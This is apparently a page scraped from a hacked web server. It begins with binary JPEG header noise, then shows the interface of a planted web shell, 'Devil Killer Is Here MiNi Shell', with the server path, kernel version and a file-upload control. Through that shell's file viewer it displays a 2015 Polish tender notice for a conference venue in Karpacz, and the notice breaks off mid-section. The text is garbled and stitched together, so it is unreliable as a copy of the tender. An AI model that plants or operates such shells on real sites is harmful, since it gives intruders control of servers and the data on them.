JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150707/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20150707/168554-N-2015.html

<p class="kh_header"><b>Zabrze: ZAPEWNIENIE BAZY NOCLEGOWO-SZKOLENIOWEJ CELEM PRZEPROWADZENIA KONFERENCJI W TERMINIE 30.09. - 02.10.2015 ROKU.
Nr referencyjny nadany sprawie przez Zamawiającego 17 ichpw 2015</b><br>
<b>Numer ogłoszenia: 168554 - 2015; data zamieszczenia: 07.07.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Instytut Chemicznej Przeróbki Węgla , ul. Zamkowa 1, 41-803 Zabrze, woj. śląskie, tel. 32 2710041, faks 32 2710809.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ichpw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZAPEWNIENIE BAZY NOCLEGOWO-SZKOLENIOWEJ CELEM PRZEPROWADZENIA KONFERENCJI W TERMINIE 30.09. - 02.10.2015 ROKU.
Nr referencyjny nadany sprawie przez Zamawiającego 17 ichpw 2015.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia są usługi polegające na zapewnieniu bazy noclegowo - szkoleniowej celem przeprowadzenia konferencji pn. KOKSOWNICTWO 2015 w terminie 30.09. - 02.10.2015 roku w obiekcie położonym w Karpaczu.
2.Przedmiot zamówienia obejmuje w szczególności zapewnienie uczestnikom konferencji: 
2.1.bazy noclegowo - szkoleniowej dla max. 200 uczestników z salą konferencyjną oraz salą bankietową, 
2.2.wyżywienia, zgodnie z wymaganiami przedstawionymi poniżej,
2.3.obsługi technicznej i informatycznej (będącej do dyspozycji Zamawiającego w całym okresie trwania konferencji), zgodnie z wymaganiami przedstawionymi poniżej,
2.4.miejsc parkingowych podczas całego pobytu, zgodnie z wymaganiami przedstawionymi poniżej. 
3.Wymagania minimalne dotyczące usługi będącej przedmiotem zamówienia: 
3.1.spotkanie ma się odbywać w ramach jednego obiektu (budynku) zapewniającego bazę noclegowo-szkoleniową,
3.2.obiekt ma być położony w Karpaczu, 
3.3.obiekt, w czasie trwania konferencji nie może być w trakcie prac remontowych, 
3.4.czas trwania konferencji - 3 dni - należy rozumieć następująco: przyjazd i zakwaterowanie pierwszego dnia około godziny 11:00, dwa noclegi, wyjazd uczestników trzeciego dnia po obiedzie,
3.5.ewentualna opłata klimatyczna ma zostać uwzględniona w całościowej opłacie za usługę,
3.6.dla organizatorów konferencji ze strony Zamawiającego zapewnienie dodatkowego noclegu (wraz z kolacją) na dzień przed rozpoczęciem spotkania dla 5 osób, oraz śniadaniem w pierwszym dniu konferencji dla tych osób,
3.7.zapewnienie osobnej recepcji dla uczestników spotkania,
3.8.zapewnienie klimatyzowanej sali konferencyjnej odpowiedniej dla 200 uczestników konferencji, 
3.9.toalety w bezpośredniej bliskości sali konferencyjnej,
3.10.sala konferencyjna nie może być zlokalizowana w bezpośredniej bliskości kuchni,
3.11.sala konferencyjna wyposażona w rzutnik pisma z foli, projektor, ekran dla prezentacji multimedialnych, flipchart, mikrofon, podłączenie do komputera, zabezpieczoną bezprzewodową sieć internetową tylko dla uczestników konferencji,
3.12.zapewnienie sali bankietowej w ilości odpowiedniej dla liczby uczestników konferencji na wyłączność Zamawiającego w dniu 30.09.2015 r. ,
3.13.zapewnienie sali na kolację biesiadną w ilości odpowiedniej dla liczby uczestników konferencji na wyłączność Zamawiającego w dniu 01.10.2015 r.
3.14.zapewnienie sali wyposażonej w podest - scenę,
3.15.zapewnienie bieżącej obsługi technicznej i informatycznej w trakcie konferencji,
3.16.zapewnienie dostępu do pomieszczenia, w którym Zamawiający będzie mógł przechowywać materiały konferencyjne na jeden dzień przed konferencją,
3.17.umożliwienie oznakowania obiektu materiałami promocyjnymi konferencji,
3.18.zapewnienie transportu dla maksymalnie 30 osób w pierwszym dniu konferencji z dworca PKP w Jeleniej Górze do obiektu oraz w ostatnim dniu na dworzec PKP (w godzinach wskazanych przez Zamawiającego po zawarciu umowy z wybranym Wykonawcą) - koszt transportu ma zostać uwzględniony w całościowej opłacie za usługę,
3.19.zapewnienie strzeżonych miejsc parkingowych dla uczestników spotkania dla 50 samochodów osobowych oraz miejsc parkingowych pod zadaszeniem dla 10 samochodów osobowych,
3.20.obiekt musi zapewniać następujące rozlokowanie osób w pokojach noclegowych: osoby nocujące samodzielnie - co najmniej 100, 2 pokoje o podwyższonym standardzie, pozostałe rozlokowanie osób - max. dwie osoby w pokoju (pokoje z osobnymi łóżkami) - dopuszcza się pokoje 2, 3, 4 - osobowe,
3.21.pokoje powinny spełniać standard wymagany dla hoteli 4 gwiazdkowych zgodnie z załącznikiem Nr 1 do rozporządzenia Ministra Gospodarki i Pracy z dnia 19 sierpnia 2004 r. w sprawie obiektów hotelarskich i innych obiektów, w których są świadczone usługi hotelarskie.
4.Zapewnienie wyżywienia i obsługi gastronomicznej dla uczestników konferencji, tj. wymaga się zapewnienia minimalnych warunków:
4.1.Kawa do posiłków podawana z ekspresu ciśnieniowego.
4.2.Posiłki dla wszystkich uczestników konferencji jednocześnie.
4.3.Rodzaje i ilość posiłków:
4.3.1.dzień przed konferencją: 
Kolacja dla 5 uczestników (organizatorów konferencji) - w formie bufetu szwedzkiego składający się z przekąsek zimnych i gorących (co najmniej 3 rodzaje), co najmniej 2 dań gorących (mięsne i rybne), dodatków skrobiowych (co najmniej 3 rodzaje np. ziemniaki, ryż, frytki, kasze, itp.), warzywa, sałatki, surówki (co najmniej 3 rodzaje), desery podane w postaci musu lub sałatki owocowej (w ilości co najmniej 1 pucharek na osobę), ciasta krojone (co najmniej 2 rodzaje w ilości co najmniej 1 porcja na osobę), napoje zimne (soki, woda mineralna gazowana i niegazowana) i gorące (kawa, herbata) do gorących napojów podane będą dodatki: mleko, cytryna, cukier.
4.3.2.pierwszy dzień konferencji:
Śniadanie dla 5 uczestników (organizatorów konferencji) - w formie bufetu szwedzkiego. Menu uwzględniać musi dania śniadaniowe gorące m.in. jajecznica, bekon, kiełbaski oraz produkty nabiałowe: jogurty, desery mleczne, musli jak również owoce (4 rodzaje), sałaty, wędlinę. Ciasta (w ilości co najmniej 2 kawałki na osobę do wyboru), rogale (z ciasta drożdżowego, francuskiego lub kruchego) w ilości 2 szt. na osobę. Świeże pieczywo różnego rodzaju. Menu uwzględniać musi dodatki: dżem, miód, musztardę, ketchup, masło. Napoje zimne (soki, woda mineralna gazowana i niegazowana) i gorące (kawa, herbata) do gorących napojów podane będą dodatki: mleko, cytryna, cukier.
Obiad dla 200 uczestników - serwowany, składający się z co najmniej z 1 zupy, co najmniej 1 dania gorącego (mięsne i rybne), co najmniej 1 dania gorącego na grillu, dodatków skrobiowych (co najmniej 2 rodzaje np. ziemniaki, ryż, frytki, kasze, itp.), warzywa, sałatki, surówki (co najmniej 2 rodzaje), desery podane w postaci musu lub sałatki owocowej (w ilości co najmniej 1 pucharek na osobę), ciasta krojone (co najmniej 1 rodzaj w ilości co najmniej 1 porcja na osobę), napoje zimne (soki, woda mineralna gazowana i niegazowana) i gorące (kawa, herbata). Do gorących napojów podane będą dodatki: mleko, cytryna, cukier.
Kolacja bankietowa dla 200 uczestników- z konsumpcją w odrębnej sali  przy stołach prostokątnych min. 12 osobowych, z obsługą kelnerską. Stoły muszą być nakryte obrusami, zastawą stołową oraz udekorowane. Napoje zimne powinny być rozstawione na wszystkich stołach. Gorące dania (zupa, danie główne) z uwzględnieniem dań dietetycznych (mięsa, jarzyny  gotowane lub ryby duszone) podane przez obsługą kelnerską. Bufet przekąsek w formie bufetu szwedzkiego. Menu zawierać musi co najmniej sałatki (co najmniej 2 rodzaje), 2 przystawki na zimno (co najmniej 2 rodzaje), mięsa pieczone i wędliny, sery, ryby, pieczywo jasne i ciemne, warzywa koktajlowe. Bufet deserowy składający się z kawy, herbaty, ciast bankietowych (co najmniej 2 rodzaje), deserów (co najmniej 2 rodzaje), owoców. Do gorących napojów podane będą dodatki: mleko, cytryna, cukier.
4.3.3.drugi dzień konferencji:
Śniadanie dla 200 uczestników - w formie bufetu szwedzkiego wg opisu jak w pierwszym dniu konferencji dla 5 uczestników (organizatorów konferencji).
Przerwa kawowa dla 200 uczestników - w formie bufetu, świeżo parzona kawa, herbata, do gorących napojów podane będą dodatki: mleko, cytryna, cukier, soki (0,25 l na osobę), woda mineralna gazowana i niegazowana (0,25 l na osobę), ciastka  kruche.
Obiad dla 200 uczestników - serwowany wg opisu jak w pierwszym dniu konferencji.
Kolacja biesiadna dla 200 uczestników - w formie bufetu szwedzkiego. Na stołach smalec, ogórek, chleb. Co najmniej 1 zupa np. barszcz czerwony, żurek, kwaśnica. Dania gorące z grilla np. krupniok, karkówka, kurczak, ziemniaki zapiekane. Deska mięs i wędlin, półmisek śledzi. Sałatki (co najmniej 2 rodzaje), surówki (co najmniej 2 rodzaje), pieczywo jasne i ciemne. Bufet deserowy składający się z kawy, herbaty, kołaczy (co najmniej 2 rodzaje). Do gorących napojów podane będą dodatki: mleko, cytryna, cukier.
4.3.4.trzeci dzień konferencji:
Śniadanie dla 200 uczestników - w formie bufetu szwedzkiego wg opisu jak w pierwszym dniu konferencji dla 5 uczestników (organizatorów konferencji).
Przerwa kawowa dla 200 uczestników - w formie bufetu, świeżo parzona kawa, herbata, do gorących napojów podane będą dodatki: mleko, cytryna, cukier, soki (0,25 l na osobę), woda mineralna gazowana i niegazowana (0,25 l na osobę), ciastka  kruche.
Obiad dla 200 uczestników - serwowany wg opisu jak w pierwszym dniu konferencji.
4.4.Pory posiłków i przerw kawowych zostaną podane Wykonawcy po ustaleniu ostatecznego harmonogramu konferencji. Zamawiający w każdym dniu Konferencji do godz. 10:00 poda Wykonawcy ostateczną ilość posiłków, która ma zostać wydana w danym dniu.
4.5.W zakresie wyżywienia Wykonawca zobowiązany jest do: 
a)przedłożenia co najmniej na 2 tygodnie przed datą rozpoczęcia konferencji 2 wariantów menu i wyboru napojów do akceptacji Zamawiającego. W przypadku zgłoszenia uwag lub zastrzeżeń do menu przez Zamawiającego, Wykonawca zobowiązuje się do ich uwzględnienia i ponownego przedłożenia menu w terminie 3 dni roboczych od otrzymania uwag lub zastrzeżeń,
b)wykonania i realizacji usługi zgodnie ze stosownymi przepisami związanymi z zachowaniem norm zbiorowego żywienia,
c)zapewnienia zastawy stołowej wraz z dekoracją stołów (z bezwzględnym wyłączeniem naczyń i sztućców jednorazowych),
d)zapewnienia profesjonalnych usług gastronomicznych, w tym dodatkowej obsługi kucharskiej podczas kolacji biesiadnej oraz obsługi kelnerskiej odpowiedniej do liczby uczestników konferencji.
5.Zapewnienie oprawy muzycznej w trakcie kolacji bankietowej- ok. 4 godzin usług profesjonalnego DJ.
6.Szczegółowy plan spotkania wraz z listą uczestników dostarczy Zamawiający co najmniej na 7 dni przed rozpoczęciem konferencji. Zamawiający zastrzega sobie możliwość modyfikacji listy uczestników o nie więcej niż 20 osób (zmniejszenie/zwiększenie), nie później niż 3 dni przed rozpoczęciem konferencji, bez konsekwencji finansowych.
7.Pozostałe warunki realizacji zamówienia zawarte zostały we wzorze umowy stanowiącym załącznik nr 6 do SIWZ..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 55.12.00.00-7, 55.30.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 29.09.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Wykonawca przystępujący do niniejszego postępowania jest obowiązany wnieść wadium na czas związania ofertą.
2.Oferta musi być zabezpieczona wadium o wartości: 4 000,00 zł (cztery tysiące złotych).
3.Wymagane wadium musi być wniesione przed upływem terminu składania ofert.
4.Wadium może być wnoszone w jednej lub kilku następujących formach:
4.1.pieniądzu,
4.2.poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
4.3.gwarancjach bankowych,                    
4.4.gwarancjach ubezpieczeniowych, 
4.5.poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jednolity Dz. U.  z 2007 r. Nr 42, poz. 275, z późn. zm.). 
5.Przy wnoszeniu wadium Wykonawca winien powołać się na nazwę niniejszego postępowania oraz nr referencyjny nadany sprawie przez Zamawiającego (nr referencyjny:  17 ichpw 2015).
6.Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego: PL36124048491111001018898168, kod SWIFT: PKOPPLPW. W przypadku wadium wniesionego w formie pieniężnej do oferty należy dołączyć kopię potwierdzenia dokonania przelewu bankowego.
7.W przypadku wadium wniesionego w formie gwarancji bankowej lub ubezpieczeniowej, udzielona gwarancja musi być gwarancją samoistną, nieodwołalną, bezwarunkową i płatną na pierwsze żądanie, bez konieczności przedkładania jakichkolwiek dodatkowych dokumentów.
8.W przypadku wadium wniesionego w formie innej niż pieniężna - oryginał dowodu wniesienia wadium należy złożyć w siedzibie Zamawiającego: Instytutu Chemicznej Przeróbki Węgla, ul. Zamkowa 1, 41-803 Zabrze pok.111.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie opisu sposobu dokonywania oceny spełnienia warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie opisu sposobu dokonywania oceny spełnienia warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie opisu sposobu dokonywania oceny spełnienia warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie opisu sposobu dokonywania oceny spełnienia warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie opisu sposobu dokonywania oceny spełnienia warunków udziału w postępowaniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">opis oferowanego miejsca i warunków konferencji, uwzględniającego co najmniej informacje dotyczące: obiektu zapewniającego bazę noclegowo-szkoleniową (otoczenia, standardu, lokalizacji, wyposażenia), pokoi dla uczestników, sali konferencyjnej i bankietowej oraz ich wyposażenia, przykładowego menu, itp. (opis winien zawierać co najmniej informacje wskazane w punktach 4 oraz 24.2.2 SIWZ) oraz broszury zawierające zdjęcia zaoferowanego obiektu.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Na zawartość oferty składa się:
